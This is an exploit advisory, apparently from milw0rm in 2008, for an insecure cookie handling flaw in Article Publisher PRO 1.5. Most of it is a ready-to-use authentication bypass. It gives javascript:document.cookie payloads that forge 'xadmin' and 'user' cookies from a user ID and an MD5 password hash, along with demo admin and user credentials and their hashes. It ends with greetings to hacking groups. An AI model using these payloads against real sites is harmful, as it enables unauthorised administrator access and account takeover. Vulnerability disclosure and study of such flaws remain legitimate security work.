[~] Article Publisher PRO Insecure Cookie Handling Vulnerability [~] [~] version: 1.5 [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 01.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] N0T: a.q kpss : ) ) [~] [~] ---------------------------------------------------------- demo admin login: http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php demo user login: http://demo-article-publisher-pro.phparticlescript.com/login.php admin_name: admin passwd: demo passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229 user_id: 1 or user_name: zorlu passwd: zorlu passwd_md5: 2178fb3ee4a88f946ecb68734b266c10 user_id: 6 or user_name: demo passwd: demo passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229 user_id: 2 exploit: admin: javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/"; user: javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/"; for demo admin: ( user_id: 1) javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/"; for demo user: ( for user zorlu user_id: 6 ) javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/"; for demo user: ( for user demo user_id: 2 ) javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/"; [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]---------------------------------------------------------------------- # milw0rm.com [2008-11-01]